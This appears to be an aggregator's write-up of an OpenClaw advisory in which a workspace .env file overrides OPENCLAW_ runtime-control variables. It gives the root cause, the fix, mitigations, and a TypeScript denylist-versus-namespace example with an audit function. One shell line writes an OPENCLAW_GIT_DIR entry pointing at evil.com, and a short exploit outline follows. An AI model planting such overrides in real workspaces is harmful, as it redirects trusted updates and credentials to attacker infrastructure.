OpenClaw, Workspace dotenv runtime-control override, GHSA-hxvm-xjvf-93f3 (moderate)

The vulnerability exists because the workspace `.env` loading mechanism failed to adequately reserve the `OPENCLAW_` runtime-control namespace. In vulnerable versions (prior to 2026.4.20), the `src/infra/dotenv.ts` module loads environment variables from a `.env` file in the current working directory before applying the secure host-enforced policies. This early loading allows an attacker who controls the workspace to place a malicious `.env` file containing variables such as `OPENCLAW_GIT_DIR`. When OpenClaw executes operations like source-update or installer flows that depend on these runtime-control variables, it reads the overridden values from the workspace `.env` instead of using the intended trusted values.

The root cause is a missing guardrail in the denylist: `src/infra/dotenv.ts` blocked only a narrow set of named variables and generic suffixes like `_API_HOST`, leaving critical connector-specific environment variables unblocked. Consequently, the loading order prioritizes the untrusted workspace `.env` over the trusted state-dir configuration, effectively bypassing OpenClaw's environment policy.

The impact is that an attacker can redirect trusted runtime behavior, alter configuration paths, and potentially redirect credentials or sensitive data to infrastructure they control. The fix ensures that the workspace dotenv loader rejects all entries that fall under the `OPENCLAW_` runtime-control namespace, thereby isolating workspace-sourced variables from system-critical runtime settings. The fix has been committed as commit 018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6.
Platform: npm package
Version: < 2026.4.20
Vulnerability: Workspace .env runtime-control override
Severity: Medium
Date: Apr 21 2026

Prediction: Apr 25 2026

What Undercode Say:

Check for malicious `.env` in current directory:

```shell
ls -la .env
```

Simulate injection attempt:

```shell
echo "OPENCLAW_GIT_DIR=https://evil.com/repo" > .env
```

If running an affected version (< 2026.4.20), the variable will be loaded.

Exploit:

  • Clone an attacker-controlled repository containing a crafted `.env` with `OPENCLAW_GIT_DIR=…` (or other `OPENCLAW_` runtime-control vars).
  • Run OpenClaw from that workspace directory.
  • The malicious `.env` is loaded before the runtime-control namespace is reserved, overriding trusted settings and steering runtime behavior.

Protection from this CVE:

  • Upgrade to OpenClaw ≥ 2026.4.20.
  • Do not run OpenClaw in untrusted directories or from unverified workspaces.
  • Remove or strictly monitor `.env` files in workspace roots if an immediate upgrade is not possible.
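The following is an added example written for this page; it is not OpenClaw's own `src/infra/dotenv.ts` code and the exact names in its narrow denylist (`OPENCLAW_CONFIG_PATH`, `OPENCLAW_STATE_DIR`) are hypothetical. It illustrates two things at once: the root-cause gap described above, where a denylist of a few named variables plus suffixes such as `_API_HOST` still lets `OPENCLAW_GIT_DIR` through, versus reserving the whole `OPENCLAW_` namespace as the fix does; and the mitigation bullet above, as an `auditWorkspaceDotenv` function that reports which keys in a workspace `.env` would land in the runtime-control namespace, useful for monitoring workspace roots while an upgrade is pending. The sample `.env` body is constructed for the example with placeholder values.

```typescript
// Added example, not OpenClaw project code. Minimal workspace .env parser plus
// the two denylist policies contrasted in the advisory.

export interface DotenvEntry {
  key: string;
  value: string;
}

// Parse a simple KEY=VALUE .env body: skips blank lines and comments, accepts an
// optional `export ` prefix, and strips one layer of matching quotes.
export function parseDotenv(body: string): DotenvEntry[] {
  const entries: DotenvEntry[] = [];
  for (const raw of body.split(/\r?\n/)) {
    const line = raw.trim();
    if (line === "" || line.startsWith("#")) continue;
    const m = /^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$/.exec(line);
    if (!m) continue;
    const [, key = "", rest = ""] = m;
    let value = rest.trim();
    const dq = value.startsWith('"') && value.endsWith('"') && value.length >= 2;
    const sq = value.startsWith("'") && value.endsWith("'") && value.length >= 2;
    if (dq || sq) value = value.slice(1, -1);
    entries.push({ key, value });
  }
  return entries;
}

// Policy A (pre-fix shape): a few named variables plus generic suffixes.
// NARROW_NAMED is a hypothetical list; "_API_HOST" is the suffix named on the page.
const NARROW_NAMED = new Set<string>(["OPENCLAW_CONFIG_PATH"]);
const GENERIC_SUFFIXES = ["_API_HOST"];

export function narrowDenylistBlocks(key: string): boolean {
  return NARROW_NAMED.has(key) || GENERIC_SUFFIXES.some((s) => key.endsWith(s));
}

// Policy B (fix shape): reserve the entire runtime-control namespace.
export const RUNTIME_CONTROL_PREFIX = "OPENCLAW_";

export function namespaceBlocks(key: string): boolean {
  return key.startsWith(RUNTIME_CONTROL_PREFIX);
}

export interface PolicyResult {
  accepted: Record<string, string>;
  rejected: string[];
}

// Split parsed entries into those a loader would merge and those it refuses.
export function applyPolicy(
  entries: DotenvEntry[],
  blocks: (key: string) => boolean,
): PolicyResult {
  const accepted: Record<string, string> = {};
  const rejected: string[] = [];
  for (const { key, value } of entries) {
    if (blocks(key)) rejected.push(key);
    else accepted[key] = value;
  }
  return { accepted, rejected };
}

// Defender-side audit: keys in a workspace .env that fall under OPENCLAW_.
// A non-empty result from an untrusted workspace root is worth an alert.
export function auditWorkspaceDotenv(body: string): string[] {
  return applyPolicy(parseDotenv(body), namespaceBlocks).rejected;
}

// Constructed sample .env for this example; values are placeholders.
// OPENCLAW_STATE_DIR is a hypothetical variable name.
export const SAMPLE_WORKSPACE_ENV = `
# constructed sample, not taken from the advisory
OPENCLAW_GIT_DIR=https://example.invalid/repo
export OPENCLAW_STATE_DIR="/tmp/attacker-state"
ACME_API_HOST=https://example.invalid
APP_DEBUG=1
`;

const entries = parseDotenv(SAMPLE_WORKSPACE_ENV);
console.log("narrow denylist rejects:", applyPolicy(entries, narrowDenylistBlocks).rejected);
console.log("namespace policy rejects:", applyPolicy(entries, namespaceBlocks).rejected);
console.log("audit of workspace .env:", auditWorkspaceDotenv(SAMPLE_WORKSPACE_ENV));
```

Run against the constructed sample, the narrow denylist rejects only `ACME_API_HOST` and lets both `OPENCLAW_` keys through, which is the gap the advisory describes; the namespace policy rejects exactly the two `OPENCLAW_` keys. The same `auditWorkspaceDotenv` call can be pointed at the contents of any `.env` found in a workspace root.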

Impact:

  • Redirection of trusted runtime behavior (e.g., `OPENCLAW_GIT_DIR` pointing to an attacker-controlled repository).
  • Potential credential theft or exposure if connector endpoint variables are overridden.
  • Stealthy configuration takeover without explicit user awareness.

Sources:

Reported By: github.com